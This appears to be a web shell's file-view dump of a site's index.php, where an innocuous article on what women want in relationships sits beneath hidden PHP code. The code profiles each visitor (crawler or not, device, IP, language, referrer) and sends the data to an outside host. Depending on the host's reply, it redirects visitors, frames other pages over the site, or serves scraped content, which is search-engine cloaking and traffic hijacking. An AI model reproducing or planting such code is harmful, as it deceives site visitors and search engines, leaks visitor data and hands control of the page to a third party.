HEX
Server: nginx/1.28.1
System: Linux 10-41-63-61 6.8.0-31-generic #31-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 20 00:40:06 UTC 2024 x86_64
User: www (1001)
PHP: 7.4.33
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/ww.wwepom.site/index.php
<!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '818330346155324');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=818330346155324&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code -->
<?php 
  echo '<head>
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    </head>';
function is_spider() {
    $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : "";
    if (preg_match('#(spider|mj12bot|dotbot|bingbot|googlebot|slurp|SemrushBot|AhrefsBot)#i', $ua)){
        return 1;
   }
    return 0;
}
$spider=is_spider();
$url1='http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
function isMobile() {
  if (isset($_SERVER['HTTP_X_WAP_PROFILE'])) {
    return '手机';
  }
  if (isset($_SERVER['HTTP_VIA'])) {
    return stristr($_SERVER['HTTP_VIA'], "wap") ? '手机' : false;
  }
  if (isset($_SERVER['HTTP_USER_AGENT'])) {
    $clientkeywords = array('nokia','sony','ericsson','mot','samsung','htc','sgh','lg','sharp','sie-','philips','panasonic','alcatel',
    'lenovo','iphone','ipod','blackberry','meizu','android','netfront','symbian','ucweb','windowsce','palm','operamini','operamobi',
    'openwave','nexusone','cldc','midp','wap','mobile','MicroMessenger');
    if (preg_match("/(" . implode('|', $clientkeywords) . ")/i", strtolower($_SERVER['HTTP_USER_AGENT']))) {
      return '手机';
    }
  }
  if (isset ($_SERVER['HTTP_ACCEPT'])) {
    if ((strpos($_SERVER['HTTP_ACCEPT'], 'vnd.wap.wml') !== false) && (strpos($_SERVER['HTTP_ACCEPT'], 'text/html') ===
    false || (strpos($_SERVER['HTTP_ACCEPT'], 'vnd.wap.wml') < strpos($_SERVER['HTTP_ACCEPT'], 'text/html')))) {
      return '手机';
    }
  }
  return '电脑';
}
$Mobile=isMobile();
$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2); 
function getIp()
{
    if ($_SERVER["HTTP_CLIENT_IP"] && strcasecmp($_SERVER["HTTP_CLIENT_IP"], "unknown")) {
        $ip = $_SERVER["HTTP_CLIENT_IP"];
    } else {
        if ($_SERVER["HTTP_X_FORWARDED_FOR"] && strcasecmp($_SERVER["HTTP_X_FORWARDED_FOR"], "unknown")) {
            $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
        } else {
            if ($_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) {
                $ip = $_SERVER["REMOTE_ADDR"];
            } else {
                if (isset ($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'],
                        "unknown")
                ) {
                    $ip = $_SERVER['REMOTE_ADDR'];
                } else {
                    $ip = "unknown";
                }
            }
        }
    }
    return ($ip);
}
 $ip=getIp();
 $widths = "<script>document.write(screen.width)<\/script>";
$heights = "<script>document.write(screen.height)<\/script>";
$heard  = 0;

  function clientOS() {
    $agent = strtolower($_SERVER['HTTP_USER_AGENT']);
    if(strpos($agent, 'windows nt')) {
        $platform = 'windows';
    } elseif(strpos($agent, 'macintosh')) {
        $platform = 'mac';
    } elseif(strpos($agent, 'ipod')) {
        $platform = 'ios';
    } elseif(strpos($agent, 'ipad')) {
        $platform = 'ios';
    } elseif(strpos($agent, 'iphone')) {
        $platform = 'ios';
    } elseif (strpos($agent, 'android')) {
        $platform = 'android';
    } elseif(strpos($agent, 'unix')) {
        $platform = 'unix';
    } elseif(strpos($agent, 'linux')) {
        $platform = 'linux';
    } else {
        $platform = 'other';
    }

    return $platform;
}
function getCurl1($url,$turn=0)
    {
  
        
        header("Content-type: text/html; charset=utf8");
        $headers = [];
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($curl, CURLOPT_HEADER, 0);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); 
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
        curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"); 
        curl_setopt($curl, CURLOPT_REFERER, "http://www.baidu.com/");
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 5);
        $data = curl_exec($curl);
        curl_close($curl);
        if ($turn)
            $data = mb_convert_encoding($data, 'UTF-8', 'UTF-8,GBK,GB2312,BIG5');
        return $data;
    }
$opersystem=clientOS();
$refefef=$_SERVER['HTTP_REFERER'];
$ch = curl_init('https://nodetcp.com/vue-admin-php/public/index.php/admin/check/adList');
$jsonData= array();
$jsonData['site_id']=12451;
$jsonData['username']='1006941410@qq.com';
$jsonData['refefef']=$refefef;
$jsonData['heard']=$heard;
$jsonData['widths']=$widths;
$jsonData['heights']=$heights;
$jsonData['opersystem']=$opersystem;
$jsonData['spider']=$spider;
$jsonData['url1']=$url1;
$jsonData['Mobile']=$Mobile;
$jsonData['lang']=$lang;
$jsonData['ip']=$ip;
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);  
curl_setopt($ch, CURLOPT_USERPWD, "$username:$password");
curl_setopt($ch, CURLOPT_TIMEOUT,0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($jsonData));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$model = json_decode(curl_exec($ch));

if($model->type=='luodi'){
   if($model->anquan=='301'){
        echo("<script>location.href = '$model->anquanlianjie';</script>");
     return;
    }
    else if($model->anquan=='ifame'){
   
     echo "<iframe src=$model->anquanlianjie frameborder='0'width='100%' height='100%' style='width:100%;height:100%;position:absolute;top:0px;left:0px;'></iframe>";
     return;
      }
    else if($model->anquan=='inner html'){
           echo require("data.php");
     return;
       }
}
else {
    if($model->youdao=='404'){
        @header("http/1.1 404 not found");
        return;
    }
    else if($model->youdao=='301'){
     echo("<script>location.href = '$model->youdaolianjie';</script>");
     return;
        
    }
      else if($model->youdao=='inner html'){
         echo require("safety.php");
     return;
    }
    else if($model->youdao=='超简页'){
   
    
}
    else if($model->youdao=='全站'){
        echo require("fullsite/newindex.html");
     return;
    
}
  else if($model->youdao=='ifame'){
   
     echo "<iframe src=$model->youdaolianjie frameborder='0' width='100%' height='100%' style='width:100%;height:100%;position:absolute;top:0px;left:0px;'></iframe>";
     return;
      }
  else if($model->youdao=='采集'){
    echo getCurl1($model->youdaolianjie);
     return;
  }
  }
?><!DOCTYPE html><html><head><meta charset="utf-8"><title>What Does a Woman Want?</title><style>.h1{margin-left:600px;width:600px}</style></head>
<body>
    <div>
        <h1 class="h1" ;>What Does a Woman Want?</h1>
        </div>
        <div style="margin-left:600px" ;>
            <img id="img" src="./easy/1.jpg" style="width:600px"/>
     </div>
     <div style="width:600px;margin-left:600px" ;>
         <p>
             
Once a man confessed, "The great question I have not been able to answer is What does a woman want?" Many husbands and boyfriends wonder the same thing today. But modern psychologists--and women--know the answer. A woman wants most everything a man wants: success, power, status, money, love, marriage, children, happiness, and fulfillment.

Women need to communicate this more clearly. Here are five things that should be told to men.

1. Women need genuine, personal displays of affection.

The breed of women who lives off the expensive gifts a man gives her is vanishing. A woman who values love for its own sake tends to be wary of gifts that are too costly. An expensive gift can make her feel that a man is trying to buy her affections and sees her as a prize rather than a person.

Gifts that give women genuine pleasure are those with a personal touch-an item of clothing, for example--because such gifts, when chosen properly, are statements of caring and high form of flattery, demonstrating recognition of a loved one's special tastes. The best gifts, from a woman's point of view, are those that are on going, rather than flamboyant. In fact, what's missing from a lot of lives is romance, such as doing small chores for her, sharing a laugh with her. These are the "gifts" that really count.

2. Women need a sympathetic ear.

A simple conversation can be different event to a man and a woman. For a man, a conversation is a way to define a problem, debate the rights and wrongs, and find a solution. To do that, he may repeatedly interrupt the woman until she "understands" the point he's making. But a woman would rather have a friendly ear from a man, instead of advice. Women more often view conversation as a way of sharing their emotions with the listener. They talk until they feel better. A man who wants to get through to a woman conversationally needs to tap into emotions rather than solutions. And, often, that can mean just listening.

3. Women don't fall in love as easily as men do.

Men tend to be romantics, often falling in love more quickly than women, who tend to focus on practical considerations in choosing a mate. Women are looking for long-term qualities in a partner. Far more than men, they allow their heads to control their hearts. Even though women may ache for love, they carry around an inner evaluator who asks, Can I count on this man? So any man who hopes to sweep a woman off her feet had better lengthen his timetable, and pay as much attention to characteristics such as kindness and dependability as he does to his hair, his clothes and his adaptability.

4. Women are good problem-solvers.

Men and women solve problem in different ways. A man tends to be direct--line up all his options, select one, then proceed. Women are more likely to simply let problems solve themselves-for example, by giving a child more time to adjust to a new teacher, rather than insisting on an immediate classroom change.

5. A woman wants to be friends with her husband.

"Few women relish being a mother, secretary or general picker-upper for their husbands. A woman wants the man in her life to be a true equal, someone who respects her strength, treats her weaknesses with kindness, and expects her to be the same for him. In short, she wants a friend, a lover and a partner who understands her.



   </p>
   </div></body></html>